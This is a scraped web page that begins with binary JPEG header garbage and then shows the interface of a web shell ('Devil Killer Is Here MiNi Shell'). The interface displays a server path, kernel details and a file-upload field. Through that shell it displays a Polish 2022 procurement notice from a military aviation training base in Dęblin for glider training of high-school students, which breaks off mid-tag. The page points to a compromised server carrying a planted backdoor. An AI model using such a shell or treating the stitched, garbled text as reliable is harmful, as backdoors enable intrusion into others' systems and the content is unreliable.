JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220719/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220719/0026617101-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Przeprowadzenie usługi szkolenia szybowcowego dla uczniów <br/>Ogólnokształcącego Liceum Lotniczego w Dęblinie. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">41. Baza Lotnictwa Szkolnego</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 061456920</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Brygady Pościgowej 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Dęblin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">08-521</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL815 - Puławski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">261-517-818</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">41blsz.przetargi@ron.mil.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.41blsz.wp.mil.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Obrona</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przeprowadzenie usługi szkolenia szybowcowego dla uczniów <br/>Ogólnokształcącego Liceum Lotniczego w Dęblinie. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-82c4268a-0734-11ed-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00266171</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-07-19</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00041860/13/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.26 Szkolenie lotnicze dla uczniów OLL</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/41blsz/proceedings <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Postępowanie prowadzone jest w<br/>języku polskim przy użyciu środków komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca<br/>2002r o świadczeniu usług drogą elektroniczną (tj. Dz. U. z 2020r, poz. 344) za pośrednictwem<br/>Platformy Zakupowej pod adresem:<br/>https://platformazakupowa.pl/pn/41blsz/proceedings<br/><br/>Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń składane są przez Wykonawcę za pośrednictwem Platformy zakupowej: <br/>https://platformazakupowa.pl/pn/41blsz/proceedings<br/><br/>Zamawiający dopuszcza również możliwość składania dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń za pomocą poczty elektronicznej, na adres e-mail: 41blsz.przetargi@ron.mil.pl , z zastrzeżeniem, że oferta musi wpłynąć na Platformę Zakupową Zamawiającego, a nie na wskazaną pocztę elektroniczną!</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający, zgodnie z<br/>Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020r w<br/>sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz<br/>środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 poz. 2452) -<br/>określa niezbędne wymagania sprzętowo -<br/>aplikacyjne umożliwiające pracę na Platformie Zakupowej, tj.:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b) komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10.4, Linux,<br/>lub ich nowsze wersje;<br/>c) zainstalowana dowolna przeglądarka internetowa; w przypadku Internet Explorer minimalnie<br/>wersja10.0.;<br/>d) włączona obsługa JavaScript;<br/>e) zainstalowany program Adobe Acrobat Reader, lub inny obsługujący format plików .pdf.;<br/>f) platforma działa według standardu przyjętego w komunikacji<br/>sieciowej - kodowanie UTF8;<br/>g) oznaczenie czasu odbioru danych przez platformę zakupową stanowi<br/>datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z<br/>zegarem Głównego Urzędu Miar2. Szczegółowo informacje zawarte są w Rozdziale 12 SWZ.<br/><br/>Oferta powinna być sporządzona w języku polskim, z zachowaniem postaci elektronicznej (przykładowe formaty danych dla<br/>sporządzenia oferty: .doc, .docx, .rtf, .xps, .odt..) Przy czym zaleca się sporządzenie oferty w formacie danych: .pdf). Oferta musi być<br/>opatrzona kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia 2016/679,<br/>zamawiający informuje, że: administratorem Pani/Pana danych osobowych jest:<br/>41. Baza Lotnictwa Szkolnego w Dęblinie<br/>ul. Brygady Pościgowej 5<br/>08 – 521 Dęblin,<br/>NIP: 506-011-18-75, REGON: 061456920,<br/>kontakt: tel. 261 517 525, e-mail: 41blsz.przetargi@ron.mil.pl<br/>b) kontakt do Inspektora ochrony danych osobowych Zamawiającego:<br/>tel. 261 518 821, e-mail: 41blsz.iod@ron.mil.pl;<br/>c) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego prowadzonego w związku z art. 359 pkt. 2) ustawy Pzp (zamówienia na usługi społeczne i inne<br/>szczególne usługi)<br/>w trybie podstawowym bez negocjacji zgodnie z art. 275 pkt 1) ustawy Pzp,<br/>o wartości szacunkowej zamówienia mniejszej niż progi unijne na:<br/>„Przeprowadzenie usługi szkolenia szybowcowego dla uczniów<br/>Ogólnokształcącego Liceum Lotniczego w Dęblinie, Nr 40/22/P&#34;<br/>d) w odniesieniu do danych osobowych osób fizycznych decyzje nie będą podejmowane w sposóbzautomatyzowany, stosowanie do art. 22 RODO;<br/>e) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 18 oraz art. 74 ustawy Pzp;<br/>Na podstawie art. 74 ust. 3 ustawy Pzp – w przypadku gdy wniesienie żądania dotyczącego prawa, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, spowoduje ograniczenie przetwarzania danych<br/>osobowych zawartych w protokole postępowania lub załącznikach do tego protokołu, od dnia zakończenia postępowania o<br/>udzielenie zamówienia zamawiający nie udostępnia tych danych, chyba<br/>że zachodzą przesłanki, o których mowa w art. 18 ust. 2 rozporządzenia 2016/679</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">W przypadku korzystania przez osobę, której dane<br/>osobowe są przetwarzane przez zamawiającego, z uprawnienia, o którym mowa w art. 15 ust. 1–3 RODO (związanych z prawem wykonawcy do uzyskania od administratora potwierdzenia, czy<br/>przetwarzane są dane osobowe jego dotyczące, prawem wykonawcy do bycia poinformowanym o odpowiednich zabezpieczeniach, o których mowa w art. 46 RODO, związanych z przekazaniem jego<br/>danych osobowych do państwa trzeciego lub organizacji międzynarodowej oraz prawem otrzymania przez wykonawcę od administratora kopii danych osobowych podlegających przetwarzaniu),<br/>zamawiający może żądać od osoby występującej z żądaniem wskazania dodatkowych informacji, mających na celu sprecyzowanie<br/>nazwy lub daty zakończonego postępowania o udzielenie<br/>zamówienia.- Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia, o którym mowa w art. 16 RODO (z uprawnienia do sprostowania lub uzupełnienia danych osobowych), nie może<br/>naruszać integralności protokołu postępowania oraz jego załączników.- W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 RODO,nie<br/>ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.- W przypadku gdy wniesienie żądania dotyczącego prawa, o którym mowa w art. 18 ust. 1 RODO<br/>spowoduje ograniczenie przetwarzania danych osobowych zawartych w protokole postępowania lub załącznikach do tego protokołu, od dnia zakończenia postępowania o udzielenie zamówienia zamawiający nie udostępnia tych danych, chyba że zachodzą przesłanki, o których mowa w art. 18 ust. 2 rozporządzenia 2016/679.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">40/22/P</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> ZADANIE I:<br/>1. Przedmiot zamówienia został podzielony na dwa (2) niezależne zadania:<br/>a) ZADANIE I - teoretyczne i praktyczne szkolenie szybowcowe dla maksymalnie<br/>18 uczniów Ogólnokształcącego Liceum Lotniczego w Dęblinie zgodnie z „Programem szkolenia szybowcowego SPL”<br/>(Sailing Pilot Licence) Wykonawcy, zatwierdzonym przez Prezesa Urzędu Lotnictwa Cywilnego;<br/>2. Szczegółowy opis przedmiotu zamówienia określa SWZ oraz:<br/>a) Załącznik Nr 1 do SWZ tj. formularz ofertowy;<br/>b) Załącznik Nr 1a do SWZ tj. szczegółowy opis przedmiotu zamówienia dla zadania I ;<br/>c) Załącznik Nr 9 do SWZ – projektowane postanowienia umowy dla zadania I ;<br/>Wszystkie załączniki stanowią integralna część niniejszej SWZ.<br/>3. Wykonawca zagwarantuje ubezpieczenie NNW uczniów na kwotę min. 50 000,00 zł (słownie: pięćdziesiąt tysięcy złotych)<br/>dla każdego ucznia. Wykonawca ponadto zapewni spełnienie wszelkich innych zabezpieczeń wymaganych przez nadzór<br/>lotniczy.<br/>4. POLISA OC:<br/>Wybrany w danym zadaniu Wykonawca zobowiązuje się do posiadania ubezpieczenia odpowiedzialności cywilnej w<br/>zakresie prowadzonej działalności związanej z przedmiotem umowy, przez cały okres realizacji umowy na kwotę minimum100.000,00 zł (słownie: sto tysięcy złotych).<br/>5. Wykonawca zobowiązuje się dostarczyć upoważnionemu przedstawicielowi Zamawiającego (osobie odpowiedzialnej za<br/>realizację umowy ze strony Zamawiającego) - w terminie 5 dni od podpisania umowy - dokumenty potwierdzające:<br/>5.1. uprawnienia instruktorów szkolenia szybowcowego;<br/>5.2. kwalifikacje i staż zawodowy opiekunów;<br/>5.3. posiadanie ubezpieczenia – polisy OC;<br/>pod rygorem rozwiązania umowy z winy Wykonawcy i naliczenia Wykonawcy kary umownej.<br/>6. Wykonawca zobowiązuje się dostarczyć upoważnionemu przedstawicielowi Ogólnokształcącego Liceum Lotniczego<br/>(osobie odpowiedzianej za realizację umowy ze strony OLL pod względem merytorycznym) - na 3 dni przed rozpoczęciem<br/>szkolenia- dokumenty potwierdzające:<br/>6.1. posiadanie ubezpieczenia (dla każdego ucznia)<br/>pod rygorem rozwiązania umowy z winy Wykonawcy i naliczenia Wykonawcy kary umownej.<br/>7. Zamawiający informuje, że przedmiotowe usługi są w całości finansowane ze środków publicznych i zgodnie z art. 43 ust.<br/>1 pkt. 29c ustawy z dnia 11 marca 2004r. o podatku od towarów i usług (Dz. U. z 2021 r. poz. 685, 694, 802, 1163,<br/>1243,1598, 1626, 2076,2105, 2427, z 2022r. poz. 196) podlegają ustawowemu zwolnieniu od podatku od towarów i usług). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80412000-5 - Usługi szkół pilotażu</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-09-04</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	ZADANIE I: teoretyczne i praktyczne szkolenie szybowcowe dla maksymalnie <br/>18 uczniów Ogólnokształcącego Liceum Lotniczego w Dęblinie zgodnie z „Programem szkolenia szybowcowego SPL” (Sailing Pilot Licence) Wykonawcy, zatwierdzonym przez Prezesa Urzędu Lotnictwa Cywilnego.<br/><br/>Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający będzie się kierował następującym kryteriami i ich znaczeniem (wagą):<br/><br/>X - cena brutto oferty – waga 100%<br/><br/>X = (Cn : Cb) x 100 x 100% (ilość punktów)<br/>gdzie<br/>X - ilość punktów uzyskanych w kryterium „cena brutto oferty”<br/>Cn– najniższa cena brutto spośród ocenianych ofert<br/>Cb – cena brutto oferty ocenianej<br/><br/>Przez „cenę brutto oferty” zamawiający rozumie „MAKSYMALNĄ WARTOŚĆ NETTO/BRUTTO” - z formularza ofertowego stanowiącego załącznik Nr 1 do SWZ, Tabela <br/>Nr 1, kolumna 5. Pod pojęciem ceny należy rozumieć cenę w rozumieniu art. 3 ust. 1 pkt 1 i ust. 2 ustawy z dnia 9 maja 2014 r. o informowaniu o cenach towarów i usług (Dz. U. z 2019 r. poz. 178). Za najkorzystniejszą cenę brutto zamawiający uznaje cenę najniższą.<br/><br/>Maksymalna liczba punktów, jaką Wykonawca może uzyskać w kryterium „cena brutto oferty” wynosi 100 punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiot zamówienia został podzielony na dwa (2) niezależne zadania:<br/>a) ZADANIE II - teoretyczne i praktyczne szkolenie szybowcowe dla maksymalnie<br/>18 uczniów Ogólnokształcącego Liceum Lotniczego w Dęblinie zgodnie z „Programem szkolenia szybowcowego SPL”<br/>(Sailing Pilot Licence) Wykonawcy, zatwierdzonym przez Prezesa Urzędu Lotnictwa Cywilnego;<br/>2. Szczegółowy opis przedmiotu zamówienia określa SWZ oraz:<br/>a) Załącznik Nr 1 do SWZ tj. formularz ofertowy;<br/>b) Załącznik Nr 1a do SWZ tj. szczegółowy opis przedmiotu zamówienia dla zadania II ;<br/>c) Załącznik Nr 9 do SWZ – projektowane postanowienia umowy dla zadania II ;<br/>Wszystkie załączniki stanowią integralna część niniejszej SWZ.<br/>3. Wykonawca zagwarantuje ubezpieczenie NNW uczniów na kwotę min. 50 000,00 zł (słownie: pięćdziesiąt tysięcy złotych)<br/>dla każdego ucznia. Wykonawca ponadto zapewni spełnienie wszelkich innych zabezpieczeń wymaganych przez nadzór<br/>lotniczy.<br/>4. POLISA OC:<br/>Wybrany w danym zadaniu Wykonawca zobowiązuje się do posiadania ubezpieczenia odpowiedzialności cywilnej w<br/>zakresie prowadzonej działalności związanej z przedmiotem umowy, przez cały okres realizacji umowy na kwotę minimum<br/>100.000,00 zł (słownie: sto tysięcy złotych).<br/>5. Wykonawca zobowiązuje się dostarczyć upoważnionemu przedstawicielowi Zamawiającego (osobie odpowiedzialnej za<br/>realizację umowy ze strony Zamawiającego) - w terminie 5 dni od podpisania umowy - dokumenty potwierdzające:<br/>5.1. uprawnienia instruktorów szkolenia szybowcowego;<br/>5.2. kwalifikacje i staż zawodowy opiekunów;<br/>5.3. posiadanie ubezpieczenia – polisy OC;<br/>pod rygorem rozwiązania umowy z winy Wykonawcy i naliczenia Wykonawcy kary umownej.<br/>6. Wykonawca zobowiązuje się dostarczyć upoważnionemu przedstawicielowi Ogólnokształcącego Liceum Lotniczego<br/>(osobie odpowiedzianej za realizację umowy ze strony OLL pod względem merytorycznym) - na 3 dni przed rozpoczęciem<br/>szkolenia- dokumenty potwierdzające:<br/>6.1. posiadanie ubezpieczenia (dla każdego ucznia)<br/>pod rygorem rozwiązania umowy z winy Wykonawcy i naliczenia Wykonawcy kary umownej.<br/>7. Zamawiający informuje, że przedmiotowe usługi są w całości finansowane ze środków publicznych i zgodnie z art. 43 ust.<br/>1 pkt. 29c ustawy z dnia 11 marca 2004r. o podatku od towarów i usług (Dz. U. z 2021 r. poz. 685, 694, 802, 1163,<br/>1243,1598, 1626, 2076,2105, 2427, z 2022r. poz. 196) podlegają ustawowemu zwolnieniu od podatku od towarów i usług). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80412000-5 - Usługi szkół pilotażu</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-09-04</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	ZADANIE II: teoretyczne i praktyczne szkolenie szybowcowe dla maksymalnie <br/>18 uczniów Ogólnokształcącego Liceum Lotniczego w Dęblinie zgodnie z „Programem szkolenia szybowcowego SPL” (Sailing Pilot Licence) Wykonawcy, zatwierdzonym przez Prezesa Urzędu Lotnictwa Cywilnego.<br/><br/>Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający będzie się kierował następującym kryteriami i ich znaczeniem (wagą):<br/><br/>X - cena brutto oferty – waga 100%<br/><br/>X = (Cn : Cb) x 100 x 100% (ilość punktów)<br/>gdzie<br/>X - ilość punktów uzyskanych w kryterium „cena brutto oferty”<br/>Cn– najniższa cena brutto spośród ocenianych ofert<br/>Cb – cena brutto oferty ocenianej<br/><br/>Przez „cenę brutto oferty” zamawiający rozumie „MAKSYMALNĄ WARTOŚĆ NETTO/BRUTTO” - z formularza ofertowego stanowiącego załącznik Nr 1 do SWZ, Tabela <br/>Nr 2, kolumna 5. Pod pojęciem ceny należy rozumieć cenę w rozumieniu art. 3 ust. 1 pkt 1 i ust. 2 ustawy z dnia 9 maja 2014 r. o informowaniu o cenach towarów i usług (Dz. U. z 2019 r. poz. 178). Za najkorzystniejszą cenę brutto zamawiający uznaje cenę najniższą.<br/><br/>Maksymalna liczba punktów, jaką Wykonawca może uzyskać w kryterium „cena brutto oferty” wynosi 100 punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span 